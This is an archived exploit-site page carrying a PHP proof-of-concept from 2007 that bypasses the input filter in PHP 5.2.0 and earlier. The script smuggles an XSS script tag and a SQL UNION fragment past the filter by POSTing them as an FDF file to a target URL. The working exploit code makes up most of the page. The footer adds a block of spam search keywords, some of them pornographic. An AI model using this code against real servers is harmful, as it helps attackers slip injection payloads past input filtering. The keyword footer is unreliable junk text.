about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , PHP <= 5.2.0 ext/filter FDF Post Filter Bypass Exploit




2007-03-10 PHP <= 5.2.0 ext/filter FDF Post Filter Bypass Exploit
Rated as : High Risk

<?php
 
////////////////////////////////////////////////////////////////////////
  //  _  _                _                     _       ___  _  _  ___ 
//
  // | || | __ _  _ _  __| | ___  _ _   ___  __| | ___ | _ \| || || _ \
//
  // | __ |/ _` || '_|/ _` |/ -_)| ' \ / -_)/ _` ||___||  _/| __ ||  _/
//
  // |_||_|\__,_||_|  \__,_|\___||_||_|\___|\__,_|     |_|  |_||_||_|  
//
  //                                                                   
//
  //         Proof of concept code from the Hardened-PHP Project       
//
  //                   (C) Copyright 2007 Stefan Esser                 
//
  //                                                                   
//
 
////////////////////////////////////////////////////////////////////////
  //            PHP ext/filtet FDF POST Filter Bybass Exploit          
//
 
////////////////////////////////////////////////////////////////////////

  // This is meant as a protection against remote file inclusion.
  die("REMOVE THIS LINE");

  // _POST is the array that will be sent to the url in $url
  $_POST = array();
  $_POST['var1'] =
"<script>alert(/XSS/);</script>";
  $_POST['var2'] = " ' UNION SELECT ";

  $url = "http://127.0.0.1/info.php";  
  
  // You do not need to change anything below this
  
  $outfdf = fdf_create();
  foreach ($_POST as $key => $value) {
    fdf_set_value($outfdf, $key, $value, 0);
  }
  fdf_save($outfdf, "outtest.fdf");
  fdf_close($outfdf);
  
  $ret = file_get_contents("outtest.fdf");
  unlink("outtest.fdf");
  
  $params = array('http' => array(
      'method' => 'POST',
      'content' => $ret,
      'header' => 'Content-Type: application/vnd.fdf'
  ));
  
  $ctx = stream_context_create($params);
  $fp = @fopen($url, 'rb', false, $ctx);
  if (!$fp) {
    die("Cannot open $url");
  }
  $response = @stream_get_contents($fp); 

  echo $response;
  echo "\n";
?> 
securitydot.net - 2007-03-10

Advertising

Copyright 2007, SecurityDot
Fri, 05 Dec 2008 17:49:06 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
xxx575xx in iceland t186t animal sex www.21zhuc Ww sxs . WWW.Sex18. gals4free. news for c gals4free. pamelasexy www.tamil t217t shilpa set xvideos.co Securitydo Ww sxs . t217t www.tamil animal por www.slazy all cartoo Sex+Ayu+Az nayanatara t713t sex video news for c INvision+P www.sxe.co sex video phpbb2 Plu ADODB Aishyaria t442t Securyti D Apache/ t132t Video+y+fo www.89.com news for c www.free.s Grind mode TELUGESEX www.desiba t879t t527t Grilr Crack+Data t879t t527t